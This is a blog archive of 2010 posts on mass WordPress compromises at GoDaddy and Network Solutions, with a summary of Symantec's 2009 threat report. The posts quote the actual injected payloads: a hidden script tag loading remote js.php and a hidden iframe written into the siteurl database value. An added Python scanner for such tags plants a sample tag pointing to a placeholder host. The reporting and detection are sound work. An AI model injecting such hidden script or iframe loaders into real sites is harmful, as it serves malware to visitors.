Archive for April, 2010

Shared Server Blogs Hacked En Mass At Godaddy

Google’s Online Security Blog (August 2009):

Entries on their malware list more than doubled in a single year, and over that period they saw as many as 40,000 websites compromised in a single week. They do concede, however, that part of the apparent increase may be due to improvements in their detection capabilities.

Another disturbing trend is that many compromised web properties point to hundreds of different source domains; the range of attack sources appears to be widening.

But still… that’s a lot of malicious code and a lot of websites.

And just last weekend, WordPress blogs hosted at GoDaddy were hit with an interesting exploit that was not immediately detectable. The malicious code only kicked in when traffic was referred from Google, which made the compromise less obvious.

The payload redirected visitors and installed malware on their computers. Some bloggers found the code when they happened to be logged in as admin: the giveaway was a broken Dashboard layout, because the injected code interfered with the loading of the CSS.

Viewing the page source showed a script src redirect just above the </body> tag in every .php file, and an infected site redirected visitors to "burnvirusnow34.xorg.pl".

Some mild relief comes from the fact that the WordPress databases were not affected, only the .php files themselves, so restoring a backup taken before April 23 will put your blog's world back in order.
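A file-level check for the injection pattern described above, added here as an example (it is not code from the original post or from GoDaddy): it walks a WordPress tree and reports any .php file whose trailing bytes before </body> carry a script tag pointing at a host outside an allow-list. The allow-list, the sample files and the attacker.invalid host are constructed for the example.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from (assumed for this example).
ALLOWED_HOSTS = {"example.com", "www.example.com"}
# Matches <script ... src="..."> and captures the URL.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)

def suspicious_scripts(html, allowed=ALLOWED_HOSTS, tail=600):
    """Return external script URLs in the last `tail` bytes before </body>."""
    idx = html.lower().rfind("</body>")
    segment = html[max(0, idx - tail):idx] if idx >= 0 else html[-tail:]
    hits = []
    for url in SCRIPT_SRC.findall(segment):
        host = urlparse(url).hostname  # None for a relative src, which we skip
        if host and host.lower() not in allowed:
            hits.append(url)
    return hits

def scan_tree(root, exts=(".php",)):
    """Walk `root`; map each PHP file (relative path) to its suspect URLs."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_scripts(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

def demo():
    """Constructed mini site: one clean file, one with the injected tag."""
    root = tempfile.mkdtemp()
    clean = ('<html><body><p>hi</p>'
             '<script src="https://example.com/app.js"></script></body></html>')
    # attacker.invalid is a placeholder host, not the domain from the incident.
    tag = '<script src="http://attacker.invalid/js.php"></script>'
    theme = os.path.join(root, "wp-content", "themes", "t")
    os.makedirs(theme)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(clean)
    with open(os.path.join(theme, "footer.php"), "w") as fh:
        fh.write(clean.replace("</body>", tag + "</body>"))
    return scan_tree(root)
```

Point scan_tree() at a real WordPress document root to run it against an install; demo() only builds a throwaway sample tree.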

However, it is not yet known how the attackers are gaining access to the hosting accounts.

GoDaddy has, of course, issued a statement regarding its shared-hosting security measures. But it has also stated, "The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners."

Then come the standard comments about your responsibilities as a website owner:

"The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you."

A blogger posted the following at WordPress's site regarding last weekend's GoDaddy assault:

"My WordPress blog, hosted on a shared Linux hosting account at GoDaddy, has been hacked. The hacker injected a JavaScript malicious redirect into the footer of each page:

<script src="http://cechirecom.com/js.php"></script>

I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I'll probably do a clean install later."


Internet Security - What You Can Do To Protect Your Business

Symantec's Internet Security Threat Report reveals that in 2009 the greatest contributors to security threats were related to poor patching of existing security flaws.

Last year saw an increase in the amount of malware created, as well as an ever-increasing level of sophistication and attack automation.

Surprisingly, the country from which the greatest percentage of attacks originates is the US.

Rank  Country          Percentage
  1   United States           34%
  2   China                    7%
  3   Brazil                   4%
  4   United Kingdom           4%
  5   Russia                   4%
  6   Germany                  4%
  7   India                    3%
  8   Italy                    2%
  9   Netherlands              2%
 10   France                   2%

Top countries of origin for Web-based attacks. Source: Symantec

Web-based attacks seem to be the flavor du jour for the criminal element. Interestingly, PDF-based download exploits increased from 11% in 2008 to 49% in 2009. The old warhorse, Internet Explorer, is still taking a beating as the second most attacked application, weighing in at 18% of web-based attacks in 2009. Some things never end.

It is also important to note that browser exploits are definitely a preference among hackers.

Mozilla Firefox saw the greatest increase in new vulnerabilities in 2009, with 169. Safari had 94 new vulnerabilities in 2009, Internet Explorer had 45, Chrome had 41 and Opera had 25.

Unfortunately, the United States likes being number one, and in this report it occupies that spot in several categories.

In 2009, the US ranked number one for:

1. Overall malicious activity
2. Sub-category: malicious code
3. Phishing hosts
4. Bots
5. Origin of attack

The US led the way with 19% of all malicious activity; the number two country, China, came in at a distant 8%.

Here are several security best-practice guidelines quoted from Symantec:

• Employ defense-in-depth strategies, which emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single-point failures in any specific technology or protection method. This should include the deployment of regularly updated antivirus, firewalls, intrusion detection, and intrusion protection systems on client systems. Using a firewall can also prevent threats that send information back to the attacker from opening a communication channel.

• Administrators should update antivirus definitions regularly to protect against the high quantity of new malicious code threats and ensure that all desktop, laptop, and server computers are updated with all necessary security patches from their operating system vendor. IDS, IPS, and other behavior-blocking technologies should also be employed to prevent compromise by new threats.

• Always keep patch levels up to date, especially on computers that host public services and applications, such as HTTP, FTP, SMTP, and DNS servers, and that are accessible through a firewall or placed in a DMZ.

• Perform both ingress and egress filtering on all network traffic to ensure that malicious activity and unauthorized communications are not taking place.

• Consider using domain-level or email authentication in order to verify the actual origin of an email message to protect against phishers who are spoofing email domains.

• Configure mail servers to block or remove email that contains file attachments that are commonly used to spread viruses, such as .vbs, .bat, .exe, .pif, and .scr files.


Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I'm not sure why, but it's possibly related to a second security attack on Network Solutions' database center. The first attack occurred on or about April 8, 2010, when a mass infection of WordPress blogs hit the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions, the infection appeared unrelated to themes or plugins, and some of the affected sites had even restricted wp-admin access to a few selected IPs via htpasswd. The only common factor was that all of them were on shared hosting at Network Solutions. A Network Solutions spokesperson said all of their WordPress blogs were affected.

It appeared to be an SQL injection attack, or a larger issue within Network Solutions' databases, for the following reasons:

No files were created, which sidesteps the more common file-based security measures. Instead, the April 8 attack modified the "siteurl" value in the wp_options table to point to a particular URL. Among other things, this completely broke the layout of the site.

Here is the row found inside affected blog databases:

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\"1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

Network Solutions announced that today's attack is the second in two weeks. Of course, they say they are doing all they can to fix the issues.

This latest attack is widespread and impacts all kinds of sites: static HTML as well as blogs, including WordPress and Joomla. Sites are being infected with iframe injections and encoded JavaScript, plus PDF exploits installed on certain sites. The encoded JavaScript is what carries out the iframe injection.

This appears to be an attack of wider scope and a greater degree of damage.

Part of the problem for many site owners is that many hosting companies keep their servers with Network Solutions. So don't assume your site could never be affected when an attack of this nature occurs on someone else's property.

Network Solutions now admits that this latest attack is happening at a deeper level: their restoration attempts have in some cases restored the malicious software itself, because it had been backed up along with their databases.

Relatedly, Google has announced that it is blacklisting as many affected sites as possible.

Tough day at Network Solutions.
